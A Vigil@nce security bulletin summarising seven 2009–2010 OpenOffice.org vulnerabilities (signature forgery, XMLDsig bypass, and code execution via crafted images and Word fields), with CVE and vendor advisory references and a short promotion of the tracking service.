The Vigil@nce team watches public vulnerabilities impacting your computers, and then offers security solutions, a database and tools to fix them.

vulnerability alert CVE-2006-4339 CVE-2009-0217 CVE-2009-2493

OpenOffice.org: several vulnerabilities

Synthesis of the vulnerability

An attacker can invite the victim to open a malicious document with OpenOffice.org, in order to execute code on his computer.
Vulnerable software: OpenOffice, Debian, Fedora, Mandriva Linux, NLD, OES, openSUSE, RHEL, SLES.
Severity of this announce: 3/4.
Consequences of an intrusion: user access/rights, data reading, data creation/edition.
Attacker's origin: document.
Number of vulnerabilities in this bulletin: 7.
Creation date: 12/02/2010.
Références of this computer vulnerability: BID-19849, BID-35671, BID-38218, CERTA-2006-AVI-384, CERTA-2007-AVI-546, CERTA-2009-AVI-279, CERTA-2009-AVI-435, CERTA-2009-AVI-452, CERTA-2009-AVI-538, CERTA-2010-AVI-080, CERTA-2010-AVI-253, CERTA-2010-AVI-499, CVE-2006-4339, CVE-2009-0217, CVE-2009-2493, CVE-2009-2949, CVE-2009-2950, CVE-2009-3301, CVE-2009-3302, DSA-1995-1, FEDORA-2010-1847, FEDORA-2010-1941, MDVSA-2010:221, RHSA-2010:0101-02, SUSE-SA:2010:017, VIGILANCE-VUL-9451, VU#456745, VU#466161, VU#845620.

Description of the vulnerability

Several vulnerabilities were announced in OpenOffice.org.

An attacker can create a malicious PKCS #1 signature which will be accepted as valid (VIGILANCE-VUL-6140). [severity:2/4; BID-19849, CERTA-2006-AVI-384, CERTA-2007-AVI-546, CVE-2006-4339, VU#845620]

The XMLDsig recommendation allows an attacker to bypass the signature of an XML document (VIGILANCE-VUL-8864). [severity:3/4; BID-35671, CERTA-2009-AVI-279, CERTA-2009-AVI-452, CERTA-2010-AVI-253, CVE-2009-0217, VU#466161]

On Windows, OpenOffice installs a vulnerable MSVC Runtime (VIGILANCE-VUL-8895). [severity:3/4; CERTA-2009-AVI-435, CERTA-2009-AVI-538, CVE-2009-2493, VU#456745]

An attacker can invite the victim to open a document containing a malicious XPM image with OpenOffice.org, in order to execute code on his computer. [severity:3/4; CERTA-2010-AVI-499, CVE-2009-2949]

An attacker can invite the victim to open a document containing a malicious GIF image with OpenOffice.org, in order to execute code on his computer. [severity:3/4; CVE-2009-2950]

An attacker can invite the victim to open a Word document containing a malicious sprmTDefTable field with OpenOffice.org, in order to execute code on his computer. [severity:3/4; CVE-2009-3301]

An attacker can invite the victim to open a Word document containing a malicious sprmTSetBrc field with OpenOffice.org, in order to execute code on his computer. [severity:3/4; CVE-2009-3302]
Full Vigil@nce bulletin... (Free trial)

Computer vulnerabilities tracking service

Vigil@nce provides system vulnerability bulletins. The Vigil@nce security watch publishes vulnerability bulletins about threats impacting the information system. The Vigil@nce team tracks computer vulnerabilities impacting systems and applications. The Vigil@nce computer vulnerability tracking service alerts your teams of vulnerabilities or threats impacting your information system.